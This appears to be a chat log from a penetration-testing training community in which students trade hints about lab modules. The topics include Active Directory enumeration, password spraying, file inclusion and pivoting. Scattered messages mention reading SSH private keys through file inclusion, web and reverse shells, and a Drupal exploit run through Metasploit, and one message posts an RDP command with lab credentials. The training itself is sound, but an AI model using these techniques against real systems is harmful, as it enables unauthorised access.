also as a slight correction; the MODULE name is Active Directory Enumeration and attacks, the SECTION is Enumerating & Retrieving Password Policies
but how
there must be some commands
??
what is needed can u tell??
if it's a domain joined machine then you might have to enumerate against an internal machine
yes I did that
the module gives you LOADS of example commands to enumerate against, not the 'external' 10.129 machine
there was an Ip I enumerate for that only
i.e. a machine on the 172.16.x.x network
Yeah I did that after typing ifconfig I found an Internal Ip and then tried above commands in module but I was not getting any results my whole point is that only.
see
Sorry Kraddy, won't be accepting the DMs for this. You're in good hands
yeah that's the internal ip OF THAT MACHINE
meaning the 10.129.x.x ip and 172.16.5.225 map to the SAME host on the network, just different subnets
yeah but when I am typing commands to enumerate for this Ip not getting any results
correct on same network but 2 diff NIC
Dual-homed ^
yes
i literally copy/pasted the first command given and it provided me with output
but when I ssh for the given machine and then tried to enumerate for the internal machine using above commands I am not getting any output
which one
literally THE FIRST ONE
rpcclient??
the cme one
I will show u mine
module is above tier 0; don't post for spoilers
ok will dm u than
i'm not accepting dms at this time
ok but I swear I'm using the exact same command cme and not getting any output
are you doing it from the provided attack host you ssh into?
because otherwise you can't reach the internal 172.16.x.x network (unless you decided to do some pivoting)
your terminal should look something like this:
┌─[htb-student@ea-attack01]─[~]
└──╼ $
i'll also recant a bit; the first question IS intended to be answered from the reading based on the wording of the question. The second one however, is meant to be enumerated
we're trying to eliminate pebkac issues
have you tried restarting the target? maybe (for whatever reason) the environment didn't spawn properly
plenty of times
yes
try changing vpn regions then, from EU -> US or US -> EU sometimes the entire shift kicks things into gear (you'll need to either restart the pwnbox or download a new vpn depending on how you're doing the questions)
I first ssh into the host from my attacker machine and from there I was able to ping the IP that is internal
im doing from pwnbox
same >.<
I need to go now, hopefully find the answer
then the first command should unequivocally provide an output; rpcclient should also provide an output
yes lee but when I nmap from the machine that I ssh into only 2 ports were opened so how can i enumerate 139, 445 when they are not opened at first place
they should be open
when I run nmap from the provided machine they show as open
if you continue having issues and resetting the environment doesn't work and changing vpns doesn't work then reach out to website support
yes: they do work on weekends, just at a lower capacity, so response times are a lot slower
they are not opened
have you tried this troubleshooting step?
ok lmt
┌─[eu-academy-1]─[10.10.15.155]─[htb-ac-1576291@htb-qsk7hzkbq2]─[~]
└──╼ [★]$ xfreerdp /v:10.129.33.10 /u:mendres /p:Inlanefreight2025!
[05:54:59:807] [16301:16302] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[05:54:59:807] [16301:16302] [ERROR][com.freerdp.core] - failed to connect to 10.129.33.10
Check your VPN connection and your network connections
Quick question: Why are the other plans "not available" ?
What other plans? There are only two annual subscriptions.
hello, i am doing LFI and FILE uploads module, i got the web shell but i cannot see the flag at /flag.txt and i also cannot pull the reverse shell what do i do? maybe its because cat /flag.txt has the spaces in it
Will htb make tracks for the other exams as well?
thats pwnbox
pwnbox dude, its not about my side problem
Have you tried resetting it yet
several times
What module is that
I am doing the cpts exam, but I am losing connection a lot.
I already switched regions.
Are there any other people with stability issues ?
Good luck bro i have no idea
Hey I am stuck at Skills Assessment - SQL Injection Fundamentals not able to figure out the webroot location of this. I have read the nginx config file but , could not find the webroot folder location. A nudge would be helpful. I have also tried readin access.log, error.log, even .ssh/id_rsa but no results there. Stuck on exactly which file to check here.
dm
guys password attacks module section password spraying ...etc, any tips?
im stuck there
EU Servers are having issues right now, high ping and connectivity issues.
ohhhh
Can someone help me with the skill assessment for file inclusion? I am having a hard time identifying the vulnerabilities
Hi there, anyone who is doing or has done Security Misconfiguration chapter from API Attacks module, willing to share a hint more than the endpoint!!!
Can anyone help me with public exploits, I literally do not understand what I'm supposed to do. Question is simple "Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)" But how do I search up exploits for an IP adress?
You don't lookup exploits via IP address. You find something vulnerable on the system and look for exploits for that application/service. Try visiting the IP:Port it gives you for clues.
Simple backup plugin for wordpress is what pops up.
Enumeration is the answer, enumerate the target, what services can you see from the page source, from Wappalyzer (install this extension if you haven't already got it). Build a picture of what technology is in use then search for vulnerabilities for this. Plugins and Themes in Wordpress are easy targets for exploits, research which ones are in use.
Great so see if you can find a vulnerability related to that, maybe one that can read the flag. Then use it on the target ip/port.
Alright thanks
HTB Forum is not able to interactions, anyone willing to share a hint for Security Misconfiguration chapter from API Attacks, will be appreciated
If you already have the endpoint then there really isn't another hint or nudge. Just apply what you've learned in the lesson
guys?
try simple passwords first
guys I think there is an error for the
module Active Directory BloodHound
Skills Assessment
Q3: Which Azure user has a path to add himself as Global Administrator?
the answer must be: S***
but its not accepting it, can anyone confirm?
try lowercase maybe
I'm in Penetration Tester - Attacking common services - Attacking SMB - When I try to get the password for Jason, using the provided password list in the resources section with crackmapexec and hydra, neither work. I get messages saying password authentication is not allowed, only publickey. Is there something I'm missing?
that pubkey error typically only happens with SSH...not smb
?
this section is just theory; unless you've already done the module and returned to it to attempt pivoting
yes the lab challenge can't seem to wrap my head around of gaining revshell
if that's the case; try one of the passwords supplied in the module for windows hosts
but you can entirely skip the challenge, it's really not gonna hurt
i have used proxychains with that creds but it can't establish a connection with the win host. I have already enabled dynamic port fwding but the session times out
actually i skipped this whole module and suffered really bad at AD enum skills assessment
the questions don't require you to pivot.
q1 asks about the ip assigned to the jump host you're provided with
q2 asks a very generic question
neither require you to complete a pivot
Remote/Reverse Port Forwarding with SSH
"In addition to answering the challenge questions, practice this technique and try to obtain a reverse shell from the Windows target."
im trying this ^
yes exactly this isn't in the challenge questions just to understand the technique that's mentioned in the theory
and i'm telling you to SKIP this optional challenge
you can practice it on other labs if you want
okay
fun fact: the labs in this module don't require you to use one strict method
has anyone experienced bad network latency with either the target machines or pwnboxes lately?
nope
I'm struggling with "API Attacks -> Broken Authentication". From the reading: "An API suffers from Broken Authentication if any of its authentication mechanisms can be bypassed" and then goes on to show how to brute force the password with just the API. Then it goes on to say "Exploit another Broken Authentication vulnerability to gain unauthorized access to the customer with the email...". I was looking through the APIs provided and I found the ones to issue the OTP, and the one to reset the password, I've been fuzzing those in various combinations with no luck. Am I missing something?
You're doing SMB sub-section and then you're attacking SSH there. Makes no sense.
i have a question. so far i have completed 81% of CWES modules. i have to cancel my subscription for some reason. if i cancel, will my progress stays as it is and will i have access to all those modules that i have completed or they go back to 0? also i am in between a module(file inclusion) and completed it almost 70% will i have access to this module or not after i cancel subscription
sorry for my worst english
progress won't be reset
you keep all modules you've completed 100%
so that means file inclusion module will left out.
that i'm not sure of, you'll have to reach out to support to confirm/deny
I am facing the same problem how did you solve it
Edit i found it thanks
Hi im working on the 'Pass the Certificate' module, and I kept encountering the same issue with running evil-winrm even though i have already updated the krb5.conf to include inlanefreight.local. Anyone can assist me with this, appreciate the help
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Cannot contact any KDC for realm 'INLANEFREIGHT.LOCAL'
Error: Exiting with code 1
again, my bad, just realized it was a starting point box, #starting-point sorry
Hi, I am doing the Attacking Common Applications -> Attacking Drupal module. The end of module assessment asks the question:
"Work through all of the examples in this section and gain RCE multiple ways via the various Drupal instances on the target host." - on one of the hosts, it didn't seem possible to ||install a module|| - is that correct? (as in I couldn't actually find the option in the admin menu). Secondly, when trying to use ||drupalgeddon3 (which I had to write it to the dir with all metasploit modules in it, reload_all and then I could see it, configure it but when I hit exploit, it didn't exploit it ...|| did others experience this?) - I've answered the question, but just curious if others had the same experience?
I'm in the same boat today. I thought the cpts module is pretty well structured and well guided. You can also see crazies like these every now and then. imho it's not about how the student can answer the lab questions but rather how they can follow the lecture discussion in the modules. ¯\_(ツ)_/¯
Hi, I am on the PENTEST IN A NUTSHELL module, Windows System Enumeration. When I run WinPEAS it just hangs in PowerShell and doesn't produce the output shown, is anyone else having this problem?
guys I'm stuck in this section, can anyone help me out .. DM me
not working
guys I think there is an error for the
module Active Directory BloodHound
Skills Assessment
Q3: Which Azure user has a path to add himself as Global Administrator?
the answer must be: S***
but it's not accepting it, can anyone confirm?
still relevant
anyone who has completed please confirm it
the funny part is that I have tried every single Azure user at this point, so I genuinely think there is a problem with it
Hey there! Yeah there are only two annual subscriptions, but neither seems to be accessible :/
Click on the Subscribe button
...where the "Not available" is ?
Well that works here, not on the beta version of the Academy 2.0
Thank you!
^ Reference
Yep
Well, looks like when we have an active subscription it doesn't work ?
Monthly are not available either
Yes, if you have a subscription, you cannot purchase another subscription.
Well on the old version I can "upgrade"
But not on the beta version it would seem
For some reason
Can anyone help please?
General question on modules, if I decide to go back and redo a module, is there a way to clear the answers out of the questions at the foot of each section?
Q3 is another question, though.
The user you are looking for for the specified question does not start with S.
No, that is not possible.
Then why is none of the Azure users I have tried, which is in total 1*, true?
no idea
Alright, thanks!
need to ask support at this point
I completed the module a long time ago. Back then, there was only the legacy version of BloodHound.
This allowed you to see the path from the user to Global Administrator
I still need to work through the module with the CE version.
Confused that BH might be the problem
You cannot enter the data yourself, but must download it. Were you able to import it into CE without any problems?